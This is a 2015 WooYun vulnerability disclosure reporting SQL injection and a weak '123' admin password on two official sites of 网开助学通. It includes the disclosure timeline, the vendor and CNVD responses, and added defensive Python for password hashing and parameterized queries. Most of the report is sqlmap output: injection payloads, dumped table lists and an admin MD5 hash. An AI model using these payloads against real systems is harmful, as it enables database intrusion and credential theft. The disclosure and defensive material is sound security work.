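Vulnerability summary

Bug ID: wooyun-2015-0135495

Vulnerability title: 网开助学通: each of its two official sites has a SQL injection vulnerability plus a weak password

Vendor: 网开助学通

Vulnerability author: 岛云首席鉴黄师

Submitted: 2015-08-22 21:31

Fixed: 2015-10-08 18:54

Publicly disclosed: 2015-10-08 18:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: Handed over to a third-party partner organization (cncert, the National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]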

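Vulnerability details

Disclosure status:

2015-08-22: Details reported to the vendor; awaiting vendor handling
2015-08-24: cncert (National Internet Emergency Center) has not yet been able to reach the organization concerned; details disclosed only to the notifying body
2015-09-03: Details disclosed to core white hats and experts in related fields
2015-09-13: Details disclosed to regular white hats
2015-09-23: Details disclosed to intern white hats
2015-10-08: Details disclosed to the public

Brief description:

Why two official sites... I don't know either. Is it because the cc and cn domains look so alike, to protect the copyright?...

Detailed description:

First official site:

http://**.**.**.**/index.php?m=News&a=detail&id=46

Second official site:

http://**.**.**.**/index.php?m=News&a=detail&id=46

The two injection points are nearly the same: apart from the database user name, everything from the table names to the columns to the back-end admin account and password is exactly identical! And while I'm complaining, the back-end password on both is 123, a weak password. What on earth are you doing?

First official site

Parameter: id (GET)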
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=News&a=detail&id=46 AND 6342=6342
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: m=News&a=detail&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))VTUb)
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: m=News&a=detail&id=-8723 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178717871,0x616b66574c6570554354,0x71706a6b71),NULL,NULL--
---
back-end DBMS: MySQL 5.0.12
Database: eoindex
[33 tables]
+---------------------------------------+
| eo_access |
| eo_account |
| eo_admin |
| eo_admin_log |
| eo_article |
| eo_auth |
| eo_auth_honest |
| eo_category |
| eo_custom |
| eo_download |
| eo_focus |
| eo_group |
| eo_help |
| eo_industry |
| eo_league |
| eo_login_log |
| eo_memo |
| eo_msg_log |
| eo_msg_tpl |
| eo_new_category |
| eo_news |
| eo_node |
| eo_note |
| eo_often_login |
| eo_online |
| eo_pay |
| eo_pay_type |
| eo_pic |
| eo_position |
| eo_reg_log |
| eo_role |
| eo_setting |
| eo_sys_config |
+---------------------------------------+
Database: eoindex
Table: eo_admin
[7 columns]
+-----------+---------------------+
| Column | Type |
+-----------+---------------------+
| add_time | int(10) |
| id | int(10) |
| last_time | int(10) |
| password | varchar(100) |
| role_id | int(10) |
| status | tinyint(1) unsigned |
| user_name | varchar(50) |
+-----------+---------------------+
Database: eoindex
Table: eo_admin
[1 entry]
+-----------+----------------------------------+
| user_name | password |
+-----------+----------------------------------+
| admin | 202cb962ac59075b964b07152d234b70 |
+-----------+----------------------------------+


Second official site

back-end DBMS: MySQL 5.0
current user: 'zxt_index@localhost'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: m=News&a=detail&id=-5705 OR 7639=7639#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: m=News&a=detail&id=46 OR (SELECT 7777 FROM(SELECT COUNT(*),CONCAT(0x71766b7171,(SELECT (ELT(7777=7777,1))),0x71787a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: m=News&a=detail&id=46 AND (SELECT * FROM (SELECT(SLEEP(5)))vFZa)
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: m=News&a=detail&id=46 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x6466747544736e6e7563,0x71787a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
back-end DBMS: MySQL 5.0
Database: zxt_index
[33 tables]
+-----------------+
| eo_access |
| eo_account |
| eo_admin |
| eo_admin_log |
| eo_article |
| eo_auth |
| eo_auth_honest |
| eo_category |
| eo_custom |
| eo_download |
| eo_focus |
| eo_group |
| eo_help |
| eo_industry |
| eo_league |
| eo_login_log |
| eo_memo |
| eo_msg_log |
| eo_msg_tpl |
| eo_new_category |
| eo_news |
| eo_node |
| eo_note |
| eo_often_login |
| eo_online |
| eo_pay |
| eo_pay_type |
| eo_pic |
| eo_position |
| eo_reg_log |
| eo_role |
| eo_setting |
| eo_sys_config |
+-----------------+
Database: zxt_index
Table: eo_custom
[8 columns]
+---------------+---------------+
| Column | Type |
+---------------+---------------+
| contact_phone | varchar(100) |
| ctime | int(11) |
| email | varchar(100) |
| id | mediumint(8) |
| im | int(8) |
| info | varchar(1000) |
| status | smallint(1) |
| type | smallint(1) |
+---------------+---------------+
Database: zxt_index
Table: eo_admin
[7 columns]
+-----------+---------------------+
| Column | Type |
+-----------+---------------------+
| add_time | int(10) |
| id | int(10) |
| last_time | int(10) |
| password | varchar(100) |
| role_id | int(10) |
| status | tinyint(1) unsigned |
| user_name | varchar(50) |
+-----------+---------------------+
Database: zxt_index
Table: eo_admin
[1 entry]
+-----------+----------------------------------+
| user_name | password |
+-----------+----------------------------------+
| admin | 202cb962ac59075b964b07152d234b70 |
+-----------+----------------------------------+
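
Both `eo_admin` rows above hold the same 32-hex-digit value, which is the unsalted MD5 of the password `123` named earlier. The following added example (not code from the site or from the report) shows an audit check for such rows and a salted PBKDF2 replacement with a minimum password policy; the denylist, the 12-character minimum, the iteration count and all function names are assumptions.

```python
import hashlib
import hmac
import os
import re

LEGACY_MD5 = re.compile(r"[0-9a-f]{32}")
# Constructed denylist; a real deployment would load a much larger list.
DENYLIST = {"123", "123456", "admin", "admin123", "password"}
ITERATIONS = 600_000  # assumed work factor for PBKDF2-HMAC-SHA256

def is_legacy_md5(stored):
    # A bare 32-hex-digit value is an unsalted MD5 digest.
    return bool(LEGACY_MD5.fullmatch(stored))

def matches_denylisted_md5(stored):
    # Audit check: does this row hold the MD5 of a denylisted password?
    return any(hashlib.md5(p.encode()).hexdigest() == stored for p in DENYLIST)

def check_policy(user_name, password):
    if len(password) < 12:
        raise ValueError("password shorter than 12 characters")
    if password.lower() in DENYLIST or user_name.lower() in password.lower():
        raise ValueError("password is denylisted or contains the user name")

def hash_password(user_name, password):
    check_policy(user_name, password)
    salt = os.urandom(16)  # per-user random salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    # Result is 118 characters, so a varchar(100) column must be widened.
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"

def verify_password(stored, password):
    if is_legacy_md5(stored):
        return False  # legacy rows go through a forced reset, never a login
    _, iters, salt, dk = stored.split("$")
    cand = hashlib.pbkdf2_hmac("sha256", password.encode(),
                               bytes.fromhex(salt), int(iters))
    return hmac.compare_digest(cand.hex(), dk)  # constant-time comparison
```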

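Proof of vulnerability:

As above. The vulnerabilities are submitted as a bundle; please give a bit more rank, thanks!

Remediation:

1. Filter input
2. Do not use weak passwords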
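
What item 1 amounts to for the `id` parameter in the URLs above, as an added example (not code from the site or from the report): the value is validated as an integer and passed as a bound parameter instead of being concatenated into the SQL text. The two-column `eo_news` table, the function names, and the use of Python with SQLite in place of the site's own stack and MySQL are assumptions made for illustration.

```python
import sqlite3

# Boolean payload shapes quoted in the sqlmap output above
# (the trailing MySQL '#' comment is dropped for SQLite).
PAYLOADS = ["46 AND 6342=6342", "-5705 OR 7639=7639"]

def make_db():
    # Constructed stand-in for the table behind m=News&a=detail&id=...
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE eo_news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO eo_news VALUES (?, ?)",
                   [(46, "public notice"), (47, "unpublished draft")])
    return db

def detail_vulnerable(db, raw_id):
    # 'Before' pattern: the request value becomes part of the SQL text,
    # so anything after the number is parsed as part of the WHERE clause.
    return db.execute(
        "SELECT id, title FROM eo_news WHERE id = " + raw_id).fetchall()

def parse_id(raw_id):
    # Allow-list validation: ASCII digits only, bounded length.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        raise ValueError("id must be a non-negative integer")
    return int(raw_id)

def detail_hardened(db, raw_id):
    # The validated integer travels as a bound parameter, never as SQL text.
    return db.execute("SELECT id, title FROM eo_news WHERE id = ?",
                      (parse_id(raw_id),)).fetchall()

def compare(db):
    # Per payload: row count from the vulnerable query vs. hardened outcome.
    results = {}
    for payload in PAYLOADS:
        try:
            hardened = detail_hardened(db, payload)
        except ValueError:
            hardened = "rejected"
        results[payload] = (len(detail_vulnerable(db, payload)), hardened)
    return results

if __name__ == "__main__":
    print(compare(make_db()))
```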

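Copyright notice: when reposting, credit the source 岛云首席鉴黄师@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2015-08-24 18:53

Vendor reply:

CNVD confirmed the situation described and has notified the site by e-mail through the site administrator's public contact channel; the administrator is to provide a fix subsequently and coordinate handling with the affected user organizations.

Latest status:

None yet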